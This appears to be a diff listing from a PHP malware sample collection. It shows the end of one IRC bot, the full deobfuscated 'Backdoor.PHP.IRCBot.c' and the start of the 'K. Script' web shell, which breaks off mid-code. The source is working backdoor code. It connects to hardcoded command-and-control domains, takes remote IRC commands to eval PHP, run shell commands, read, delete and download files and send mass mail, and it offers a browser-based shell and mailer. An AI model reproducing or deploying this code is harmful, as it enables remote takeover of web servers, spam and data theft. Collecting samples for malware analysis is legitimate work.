elseif ($com[3]==':`nickmode' && $com[4]) {
$nickmode = $com[4];
fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
}
elseif ($com[3]==':`chanlist') {
fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
}
elseif ($com[3]==':`userlist') {
$userlist="";
foreach ($auth as $user) {
if ($user["pass"]) { $pass="-pass ok"; }
else { $pass="-no pass"; }
$userlist .= $user["name"].'('.$user["status"].$pass.') ';
}
fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
}
elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`quit");
$msg = str_replace(":`quit","",$msg);
if (strlen($msg)>3) {
$msg = str_replace(" ","_",$msg);
}
$quit1 = array("ngantor","nguantuk","sama","brb","bye_all","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart");
$quitmsg = $quit1[rand(0,count($quit1) - 1)];
fputs($fp, 'QUIT ' . $quitmsg . CRL);
$keluar = 1;
exit;
}
elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {
if (!eregi(".dal.net",$com[4])) {
$remotehost = "irc.dal.net";
} else { $remotehost = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT changging_server' . CRL);
}
elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$username = $username;
} else { $username = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_ident' . CRL);
}
elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$realname = "--";
} else { $realname = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_fullname' . CRL);
}
elseif ($com[3]==':`topic' && $com[4] && $chan) {
$msg = strstr($data,":`topic");
$msg = str_replace(":`topic ","",$msg);
fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
}
elseif ($com[3]==':!help' && !$chan) {
fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);
}
} else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth <your pass> To Authorized '. CRL); }
}
}
elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) {
if (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '. $Admin .' :_4inviter: ' . $dFrom . '_2:' .$iText. CRL);
}
$inv = strstr($dFrom,'@');
foreach ($auth as $user) {
if ($user["status"]=="user") {
fputs($fp, 'NOTICE '.$user["name"].' :_KB '.$chan.' '.$dNick.' '.$inv.'_' . CRL);
}
}
}
}
elseif (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '.$Admin.' :_6' . $dFrom . '_12:' .$iText. CRL);
}
}
}
}
}
elseif (substr($data,0,4) == 'PING') {
fputs($fp,'PONG ' . substr($data,5) . CRL);
$smile = $querym[rand(0,count($querym) - 1)];
$kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL);
}
}
}
fclose ($fp);
} while ($keluar==0);
}
working($nick);
?>

713
PHP/Backdoor.PHP.IRCBot.c Normal file
View File

@ -0,0 +1,713 @@
<?php
// "PHP/Obfu.A"
// Found on Google (http://www.google.com/search?q=%24ra87deb01c5f53&num=20&hl=en&safe=off&filter=0)
// I have no clue if it runs, didn't test it, just wanted to see how it worked so I made it readable.
exit('no...');
set_time_limit(0);
ini_set("max_execution_time", 0);
set_magic_quotes_runtime(0);
ini_set('output_buffering', 0);
error_reporting(0);
ignore_user_abort();
$settings = array(
"po" => 8080, // Port
"sp" => "uJijk4iVsIXRmQ==", // Server Password, secretpass
"ch" => "aFaw", // Channel, ##p
"ke" => "spd1iYSUqA==", // Channel Key, md5hash
"ha" => "dG1qQk1halK/nE6N", // Admin host RegEx, /:*!*@*.av$/
"pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=", // Admin password (md5 hash), 9dd4e461268c8034f5c8564e155c67a6
"tr" => "*", // Command prefix
"mrnd" => 9, // Nick/User length
"mo" => "cqtrig==", // -x+i
"ve" => "dmFyWA==" // 1.27
);
function remove_spaces($input)
{
$input = str_replace(" ", "", $input);
return $input;
}
function decode($input)
{
$input = base64_decode(remove_spaces($input));
return $input;
}
function connect()
{
global $settings;
$logged_in = array(
);
$last_line = "";
$servers = array(
"sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==", // mymusicband.weedns.com
"sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR", // myphonenumber.weedns.com
"rpihlYyTr5LWVKHDi6SRl0+jko4=", // ieatironx.weedns.com
"rZytgpFPr5TDlI7MmW6FiQ==", // himan.opendns.be
"sKJuhYdPopDTi5bHlKVRhoY=", // ko.dd.blueline.be
"tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ", // p4n33123e.dd.blueline.be
"vaOokJFUbpPOi5jClLNRhoY=", // xphon3.opendns.be
"sqywiZKPpVeMipjHlm6RiZU=", // myphone3.dnip.net
"sqytlpaKo5eMipjHlm6RiZU=" // mymusics.dnip.net
);
shuffle($servers);
if (($socket = fsockopen(decrypt_settings($servers[0]), $settings['po'], $errorno, $errorstr, 15))) {
$current_nick = generate_nick($settings['mrnd']);
if (strlen($settings['sp']) > 0) {
// UEFTUw==: PASS
write_file($socket, decode("UEFTUw=="). " " . decrypt_settings($settings['sp']));
}
// VVNFUg==: USER
write_file($socket, decode("VVNFUg=="). " " . generate_user($settings['mrnd']).
" 127.0.0.1 localhost :$current_nick");
// TklDSw==: NICK
write_file($socket, decode("TklDSw=="). " $current_nick");
while (!feof($socket)) {
$line = trim(fgets($socket, 512));
$irc_params = explode(" ", $line);
if (($line == $last_line))
continue;
// UElORw==: PING
if (isset($irc_params[0]) && $irc_params[0] == decode("UElORw==")) {
// UE9ORw==: PONG
write_file($socket, decode("UE9ORw=="). " " . $irc_params[1]);
}
else if (isset($irc_params[1]) && $irc_params[1] == decode("MDAx")) {
// TU9ERQ==: MODE
write_file($socket, decode("TU9ERQ=="). " $current_nick " . decrypt_settings($settings['mo']));
// Sk9JTg==: JOIN
write_file($socket, decode("Sk9JTg=="). " " . decrypt_settings($settings['ch']). " " .
decrypt_settings($settings['ke']));
}
else if (isset($params[1]) && $params[1] == decode("NDMz")) {
// TklDSw==: NICK
write_file($socket, decode("TklDSw=="). " $current_nick");
}
else if (isset($irc_params[1]) && isset($logged_in[$irc_params[1]])) {
unset($logged_in[$irc_params[1]]);
}
// UFJJVk1TRw==: PRIVMSG
else if (isset($irc_params[1]) && ($irc_params[1] == decode("UFJJVk1TRw==") || $irc_params[1] == "332")) {
$full_params = strstr($line, " :");
$full_params = substr($full_params, 2);
$params = explode(" ", $full_params);
$target_host = $irc_params[0];
$target_nick = explode("!", $target_host);
$target_nick = substr($target_nick[0], 1);
$silent = FALSE;
// VkVSU0lPTg==: VERSION
if ($params[0] == "\1" . decode("VkVSU0lPTg=="). "\1") {
// VkVSU0lPTg==: VERSION
write_file($socket, "NOTICE " . $target_nick . " :\1" . decode("VkVSU0lPTg=="). " " .
decrypt_settings($settings['ve']). "\1");
}
for ($i = 0; $i < count($params); $i++) {
if ($params[$i] == "-s") {
$silent = TRUE;
}
}
if ($irc_params[1] == "332") {
$target = $irc_params[3];
}
elseif ($irc_params[2] == $current_nick) {
$target = $target_nick;
}
else {
$target = $irc_params[2];
}
if ($params[0] == PHP_OS) {
array_shift($params);
}
if (substr($params[0], 0, 1) == $settings['tr']) {
if (isset($logged_in[$target_host]) || $irc_params[1] == "332") {
switch (substr($params[0], 1)) {
// sKM=: lo
case decrypt_command("sKM="):
if ($irc_params[1] != "332") {
$logged_in[$target_host] = FALSE;
// I'm not sure what is up with this, looks like a bug, htmen is not a function
send_irc_message($socket, $silent, $target, htmen("b3V0"));
}
break;
// qGWaoKKb: d1enow
case decrypt_command("qGWaoKKb"):
// UVVJVCA6SSBRVUlU: QUIT :I QUIT
write_file($socket, decode("UVVJVCA6SSBRVUlU"));
fclose($socket);
exit(0);
break;
// tpWs: raw
case decrypt_command("tpWs"):
if (count($params) > 1) {
write_file($socket, substr($full_params, strlen($params[0])));
}
break;
// sKc=: ls
case decrypt_command("sKc="):
if (isset($params[1])) {
$directory = $params[1];
}
else {
$directory = getcwd();
}
if (is_dir($directory)) {
if (($handle = opendir($directory))) {
// RGlyLy8gTm93...: Dir// Now listing:
send_irc_message($socket, $silent, $target, decode("RGlyLy8gTm93IGxpc3Rpbmc6"). " \2" .
$directory . "\2");
while (($file = readdir($handle)) !== FALSE) {
if ($file != "." && $file != "..") {
send_irc_message($socket, $silent, $target, "> (" . filetype($directory . "/" .
$file). ") $file");
sleep(1);
}
}
closedir();
}
else {
// RGlyLy8gVW5h...: Dir// Unable to list contents of
send_irc_message($socket, $silent, $target,
decode("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y="). " \2" . $directory . "\2");
}
}
else {
// RGlyLy8=: Dir//
// aXMgbm90IGEgZGlyIQ==: is not a dir!
send_irc_message($socket, $silent, $target, decode("RGlyLy8="). " \2" . $directory . "\2 " .
decode("aXMgbm90IGEgZGlyIQ=="));
}
break;
// p5Wp: cat
case decrypt_command("p5Wp"):
if (count($params) > 1) {
if (is_file($params[1])) {
if (($file_handle = fopen($params[1], "r"))) {
// Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=: CAT// Now reading file:
send_irc_message($socket, $silent, $target, decode("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=").
" \2" . $params[1]. "\2");
while (!feof($file_handle)) {
$file_line = trim(fgets($file_handle, 256));
send_irc_message($socket, $silent, $target, "> $file_line");
sleep(1);
}
send_irc_message($socket, $silent, $target, "> [EOF]");
}
else {
// Q0FULy8gQ291bGRuJ3Qgb3Blbg==: CAT// Couldn't open
send_irc_message($socket, $silent, $target, decode("Q0FULy8gQ291bGRuJ3Qgb3Blbg==").
" \2" . $params[1]. "\2 for reading.");
}
}
else {
// Q0FULy8=: CAT//
// aXMgbm90IGEgZmlsZQ==: is not a file
send_irc_message($socket, $silent, $target, decode("Q0FULy8="). " \2" . $params[1]. "\2 " .
decode("aXMgbm90IGEgZmlsZQ=="));
}
}
break;
// tKuZ: pwd
case decrypt_command("tKuZ"):
// UFdELy8gQ3VycmVudCBkaXI6: PWD// Current dir:
send_irc_message($socket, $silent, $target, decode("UFdELy8gQ3VycmVudCBkaXI6"). " " . getcwd());
break;
// p5g=: cd
case decrypt_command("p5g="):
if (count($params) > 1) {
if (chdir($params[1])) {
// Q0QvLyBDaGFuZ2VkIGRpciB0bw==: CD// Changed dir to
send_irc_message($socket, $silent, $target, decode("Q0QvLyBDaGFuZ2VkIGRpciB0bw=="). " " .
$params[1]);
}
else {
// Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg==: CD// Failed to change dir
send_irc_message($socket, $silent, $target, decode("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
}
}
break;
// tqE=: rm
case decrypt_command("tqE="):
if (count($params) > 1) {
if (unlink($params[1])) {
// Uk0vLyBEZWxldGVk: RM// Deleted
send_irc_message($socket, $silent, $target, decode("Uk0vLyBEZWxldGVk"). " \2" .
$params[1]. "\2");
}
else {
// Uk0vLyBGYWlsZWQgdG8gZGVsZXRl: RM// Failed to delete
send_irc_message($socket, $silent, $target, decode("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl").
" \2" . $params[1]. "\2");
}
}
break;
// uKOqlZs=: touch
case decrypt_command("uKOqlZs="):
if (count($params) > 1) {
if (touch($params[1])) {
// VG91Y2gvLyBUb3VjaGVk: Touch// Touched
send_irc_message($socket, $silent, $target, decode("VG91Y2gvLyBUb3VjaGVk"). " \2" .
$params[1]. "\2");
}
else {
// VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=: Touch// Failed to touch
send_irc_message($socket, $silent, $target, decode("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=").
" \2" . $params[1]. "\2");
}
}
break;
// t62inpySoA==: symlink
case decrypt_command("t62inpySoA=="):
if (count($params) > 2) {
if (symlink($params[1], $params[2])) {
// U3ltTGluay8vIFN5bWxpbmtlZA==: SymLink// Symlinked
send_irc_message($socket, $silent, $target, decode("U3ltTGluay8vIFN5bWxpbmtlZA==").
" \2" . $params[2]. "\2 To \2" . $params[1]. "\2");
}
else {
// U3ltTGluay8vIEZhaWxlZCB0byBsaW5r: SymLink// Failed to link
send_irc_message($socket, $silent, $target, decode("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r").
" \2" . $params[2]. "\2 To \2" . $params[1]. "\2");
}
}
break;
// p5ykqaE=: chown
case decrypt_command("p5ykqaE="):
if (count($params) > 2) {
if (chown($params[1], $params[2])) {
// Q2hvd24vLyBDaG93bmVk: Chown// Chowned
send_irc_message($socket, $silent, $target, decode("Q2hvd24vLyBDaG93bmVk").
" \2" . $params[1]. "\2 To \2" . $params[2]. "\2");
}
else {
// Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=: Chown// Failed to chown
send_irc_message($socket, $silent, $target, decode("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=").
" \2" . $params[1]. "\2 To \2" . $params[2]. "\2");
}
}
break;
// p5yioZc=: chmod
case decrypt_command("p5yioZc="):
if (count($params) > 2) {
if (chmod($params[1], $params[2])) {
// Q2htb2QvLyBDaG1vZGRlZA==: Chmod// Chmodded
send_irc_message($socket, $silent, $target, decode("Q2htb2QvLyBDaG1vZGRlZA==").
" \2" . $params[1]. "\2 with permissions \2" . $params[2]. "\2");
}
else {
// Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=: Chmod// Failed to chmod
send_irc_message($socket, $silent, $target, decode("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=").
" \2" . $params[1]. "\2");
}
}
break;
// sZ+Zm6U=: mkdir
case decrypt_command("sZ+Zm6U="):
if (count($params) > 1) {
if (mkdir($params[1])) {
// TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==: MKDir// Created directory
send_irc_message($socket, $silent, $target, decode("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==").
" \2" . $params[1]. "\2");
}
else {
// TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==: MKDir// Failed to create directory
send_irc_message($socket, $silent, $target,
decode("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ=="). " \2" . $params[1]. "\2");
}
}
break;
// tqGZm6U=: rmdir
case decrypt_command("tqGZm6U="):
if (count($params) > 1) {
if (rmdir($params[1])) {
// Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==: RMDir// Removed directory
send_irc_message($socket, $silent, $target, decode("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==").
" \2" . $params[1]. "\2");
}
else {
// Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==: RMDir// Failed to remove directory
send_irc_message($socket, $silent, $target,
decode("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ=="). " \2" . $params[1]. "\2");
}
}
break;
// p6Q=: cp
case decrypt_command("p6Q="):
if (count($params) > 2) {
if (copy($params[1], $params[2])) {
// Q1AvLyBDb3BpZWQ=: CP// Copied
send_irc_message($socket, $silent, $target, decode("Q1AvLyBDb3BpZWQ="). " \2" . $params[1].
"\2 to \2" . $params[2]. "\2");
}
else {
// Q1AvLyBGYWlsZWQgdG8gY29weQ==: CP// Failed to copy
send_irc_message($socket, $silent, $target, decode("Q1AvLyBGYWlsZWQgdG8gY29weQ=="). " \2" .
$params[1]. "\2 to \2" . $params[2]. "\2");
}
}
break;
// sZWeng==: mail
case decrypt_command("sZWeng=="):
if (count($params) > 4) {
$from = "From: <" . $params[2]. ">\r\n";
if (mail($params[1], $params[3], substr($full_params, $params[4]), $from)) {
// TWFpbC8v: Mail//
send_irc_message($socket, $silent, $target, decode("TWFpbC8v"). " Message sent to \2" .
$params[1]. "\2");
}
else {
// TWFpbC8v: Mail//
send_irc_message($socket, $silent, $target, decode("TWFpbC8v"). " Send failure");
}
}
break;
// sZ+ilmg=: mkmd5
case decrypt_command("sZ+ilmg="):
// TUQ1Ly8=: MD5//
send_irc_message($socket, $silent, $target, decode("TUQ1Ly8="). " " . md5($params[1]));
break;
// qKKo: dns
case decrypt_command("qKKo"):
if (isset($params[1])) {
$ip_array = explode(".", $params[1]);
if (count($ip_array) == 4 && is_numeric($ip_array[0]) && is_numeric($ip_array[1]) &&
is_numeric($ip_array[2]) && is_numeric($ip_array[3])) {
// RE5TLy8=: DNS//
send_irc_message($socket, $silent, $target, decode("RE5TLy8="). " " . $params[1]. " -> " .
gethostbyaddr($params[1]));
}
else {
// RE5TLy8=: DNS//
send_irc_message($socket, $silent, $target, decode("RE5TLy8="). " " . $params[1]. " -> " .
gethostbyname($params[1]));
}
}
break;
// tpmoppSWqQ==: restart
case decrypt_command("tpmoppSWqQ=="):
// UVVJVCA6UVVJVC4uLg==: QUIT :QUIT...
write_file($socket, decode("UVVJVCA6UVVJVC4uLg=="));
fclose($socket);
connect();
break;
// tqI=: rn
case decrypt_command("tqI="):
if (isset($params[1])) {
$current_nick = generate_nick((int)$params[1]);
// TklDSw==: NICK
write_file($socket, decode("TklDSw=="). " $current_nick");
}
else {
$current_nick = generate_nick($settings['mrnd']);
// TklDSw==: NICK
write_file($socket, decode("TklDSw=="). " $current_nick");
}
break;
// tJyl: php
case decrypt_command("tJyl"):
if (count($params) > 1) {
eval(substr($full_params, strlen($params[0])));
}
break;
// q5mp: get
case decrypt_command("q5mp"):
if (count($params) > 2) {
if (!($file_handle = fopen($params[2], "w"))) {
// R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ=: Get// Permission denied
send_irc_message($socket, $silent, $target,
decode("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
}
else {
if (!($file_array = file($params[1]))) {
// R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ=: Get// Bad URL/DNS error
send_irc_message($socket, $silent, $target,
decode("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
}
else {
for ($i = 0; $i < count($file_array); $i++) {
fwrite($file_handle, $file_array[$i]);
}
// R2V0Ly8=: Get//
send_irc_message($socket, $silent, $target, decode("R2V0Ly8=").
" \2" . $params[1]. "\2 downloaded to \2" . $params[2]. "\2");
}
fclose($file_handle);
}
}
break;
// sp0=: ni
case decrypt_command("sp0="):
// TmV0SW5mby8v: NetInfo//
send_irc_message($socket, $silent, $target, decode("TmV0SW5mby8v"). " IP: " . $_SERVER['SERVER_ADDR'].
" Hostname: " . $_SERVER['SERVER_NAME']);
break;
// t50=: si
case decrypt_command("t50="):
// U3lzaW5mby8v: Sysinfo//
send_irc_message($socket, $silent, $target, decode("U3lzaW5mby8v"). " [User: " . get_current_user().
"] [PID: " . getmypid(). "] [Version: PHP " . phpversion(). "] [OS: " . PHP_OS .
"] [Server_software: " . $_SERVER['SERVER_SOFTWARE']. "] [Server_name: " . $_SERVER['SERVER_NAME'].
"] [Admin: " . $_SERVER['SERVER_ADMIN']. "] [Docroot: " . $_SERVER['DOCUMENT_ROOT']. "] [HTTP Host:
" . $_SERVER['HTTP_HOST']. "] [URL: " . $_SERVER['REQUEST_URI']. "]");
break;
// tKOnpqKUmuw=: portopen
case decrypt_command("tKOnpqKUmuw="):
if (isset($params[1], $params[2])) {
if (fsockopen($params[1], (int)$params[2], $t56bd7107802eb, $errorstr, 5)) {
// UG9ydENoay8v: PortChk//
send_irc_message($socket, $silent, $target, "" . decode("UG9ydENoay8v"). " " . $params[1].
":" . $params[2]. " is \2Open\2");
}
else {
// UG9ydENoay8v: PortChk//
send_irc_message($socket, $silent, $target, "" . decode("UG9ydENoay8v"). " " . $params[1].
":" . $params[2]. " is \2Closed\2");
}
}
break;
// uaKWn5g=: uname
case decrypt_command("uaKWn5g="):
// VW5hbWUvLw==: Uname//
send_irc_message($socket, $silent, $target, decode("VW5hbWUvLw=="). " " . php_uname());
break;
// rZg=: id
case decrypt_command("rZg="):
// SUQvLw==: ID//
send_irc_message($socket, $silent, $target, decode("SUQvLw=="). " " . getmypid());
break;
// p6GZ: cmd
case decrypt_command("p6GZ"):
if (count($params) > 1) {
$process_handle = popen(substr($full_params, strlen($params[0])), "r");
while (!feof($process_handle)) {
$output = trim(fgets($process_handle, 512));
if (strlen($output) > 0) {
send_irc_message($socket, $silent, $target, "> " . $output);
sleep(1);
}
}
// PiBbRU9GXQ==: > [EOF]
send_irc_message($socket, $silent, $target, decode("PiBbRU9GXQ=="));
}
break;
// qayalaiYmg==: execute
case decrypt_command("qayalaiYmg=="):
execute(substr($full_params, strlen($params[0])));
break;
}
}
else {
switch (substr($params[0], 1)) {
// bg==: *
case decrypt_command("bg=="):
if (isset($params[1]) &&
md5($params[1]) == decrypt_settings($settings['pa']) &&
preg_match(decrypt_settings($settings['ha']), $target_host)) {
// UmVhZHkvLyBPaw==: Ready// Ok
send_irc_message($socket, $silent, $target, decode("UmVhZHkvLyBPaw=="));
$logged_in[$target_host] = TRUE;
}
else {
// UmVhZHkvLyByZWplY3RlZA==: Ready// rejected
send_irc_message($socket, FALSE, decrypt_settings($settings['ch']),
decode("UmVhZHkvLyByZWplY3RlZA=="));
}
break;
}
}
}
}
$last_line = $line;
}
fclose($socket);
sleep(3);
connect();
}
else {
shuffle($servers);
connect();
}
}
function write_file($handle, $text)
{
fwrite($handle, "$text\r\n");
}
function send_irc_message($socket, $silent, $target, $text)
{
if ($silent != TRUE) {
// UFJJVk1TRw==: PRIVMSG
write_file($socket, decode("UFJJVk1TRw=="). " $target :$text");
}
}
function decrypt_command($input)
{
$output = '';
$input = base64_decode($input);
for ($i = 0; $i < strlen($input); $i++) {
$character = substr($input, $i, 1);
// NDU...: 4523$5~321443425^fdGsdfG#$6@353@$5@#$5@54475&45&6%7%^^8^&*@!~#4~23432$@#!4!23$3%34%2#$5#@$5234%6%4678^&!@3D
// Strlen: 107
$offset_character = substr(
decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDM" .
"yJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="),
($i % strlen(decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKk" .
"AhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="))) - 1,
1
);
$character = chr(ord($character) - ord($offset_character));
$output .= $character;
}
return $output;
}
function generate_nick($length)
{
$return = '';
for ($i = 0; $i < $length; $i++) {
$return .= chr(mt_rand(0, 25) + 97);
}
if (posix_getegid() == 0) {
$return = "r-" . $t2cb9df9898e55;
}
return $return;
}
function execute($command)
{
$output = '';
if (!empty($command)) {
if (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
}
elseif (function_exists('shell_exec')) {
$output = @shell_exec($command);
}
elseif (function_exists('system')) {
@ob_start();
@system($command);
$output = @ob_get_contents();
@ob_end_clean();
}
elseif (function_exists('passthru')) {
@ob_start();
@passthru($command);
$output = @ob_get_contents();
@ob_end_clean();
}
elseif (@is_resource($handle = @popen($command, "r"))) {
$output = "";
while (!@feof($handle)) {
$output .= @fread($handle, 1024);
}
@pclose($handle);
}
}
return $output;
}
function decrypt_settings($input)
{
$output = '';
$input = base64_decode($input);
for ($i = 0; $i < strlen($input); $i++) {
$character = substr($input, $i, 1);
// M0A...: 3@!#!@$^&*^&@#$!@#!@#!$#%#$%#$%e32@34@hTh4@we5635^!@#*^7FHGE$@%@#@#$@#!@#$!@#@!#$#%#$%^%&^%&%^&*SDF#@$!FAW$FAASDE
// Strlen: 113
$offset_character = substr(
decode("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUj" .
"JCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="),
($i % strlen(decode("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQ" .
"hQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="))) - 1,
1
);
$character = chr(ord($character) - ord($offset_character));
$output .= $character;
}
return $output;
}
function generate_user($length)
{
$return = "";
for ($i = 0; $i < $length; $i++) {
$return .= chr(mt_rand(0, 25) + 97);
}
return $return;
}
connect();
?>

402
PHP/Backdoor.PHP.KScr.e Normal file
View File

@ -0,0 +1,402 @@
<?php
$Title = "K. Script v0.3 Beta By $alla$$: ";
$GraphicHeader = '<meta http-equiv="Content-Type" content="text/html; charset=windows-1257">
<style type="text/css">
body{ background-color: #F6F6F6; text-align: center; width: 100%; padding: 0px; margin: 0px; }
#unCenter{ width: 300px; margin-left: auto; margin-right: auto; text-align: left; }
#unCenterShell{ width: 600px; margin-left: auto; margin-right: auto; text-align: left; }
#unCenterMailer{ width: 700px; margin-left: auto; margin-right: auto; text-align: left; }
#unCenterProxy{ width: 750px; margin-left: auto; margin-right: auto; }
#unCenterHeader{ width: 800px; margin-left: auto; margin-right: auto; text-align: center; }
.Marged{ margin-top: 20px; }
.Input{ border: 1px solid #DADADA; }
.Table{ border: 1px solid #DADADA; background-color: White; padding: 10px; font: 11px Tahoma, Verdana, sans-serif; line-height: 17px; color: Gray; }
.TableHeader{ border: 1px solid #DADADA; background-color: White; padding: 2px; font: 11px Tahoma, Verdana, sans-serif; line-height: 17px; color: Gray; }
a{ text-decoration: none; color: #003473; }
a:hover{ text-decoration: none; color: #F5822B;}
img{ border: 0px; }
h1{ font-size: 14px; font-weight: bold; padding: 0px; margin-bottom: 7px; }
.Black{ color: Gray; font: 11px Tahoma, Verdana, sans-serif; }
.BlackRealy{ color: Black; font: 12px Tahoma, Verdana, sans-serif; }
</style>';
$SiteHeader = '</head><body><br>
<a href="?MainPage"><img src="http://kenshin-lt.net/images/fuck.gif" width="50" height="50" alt="Home"></a>
<div><hr width="90%" size="1.5px" noshade="noshade"></div>';
$GraphicFooter = '<div><br><hr width="90%" size="1.5px" noshade="noshade"></div>
<div align="center" class="black">[<a href="?ProxyDetect">ProxyDetect</a>]
<span class="BlackRealy"> | </span>[<a href="?Uploader">FileUploader</a>]
<span class="BlackRealy"> | </span>[<a href="?PHPShell">PHPShell</a>]
<span class="BlackRealy"> | </span>[<a href="?PortCheck">PortCheck</a>]
<span class="BlackRealy"> | </span>[<a href="?Mailer">MassMailer</a>]
<span class="BlackRealy"> | </span>[<a href="?DeleteMe">Delete Me</a>]</div>
<div align="center" class="Black">Copyright &copy; 2007 <a href="mailto:shaun.wades@gmail.com">Shaun$$</a></div>
</body></html>';
$Slash = '/';
if ($_SERVER['QUERY_STRING'] == '') header("Location: http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?MainPage");
if(isset($_GET['PHPShell'])) {
$passwd = array();
$aliases = array();
session_start();
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) {
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_REQUEST['command']);
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
if ($regs[1][0] == '/') {
$new_dir = $regs[1];
} else {
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
chdir($_SESSION['cwd']);
$length = strcspn($_REQUEST['command'], " \t");
$token = substr($_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
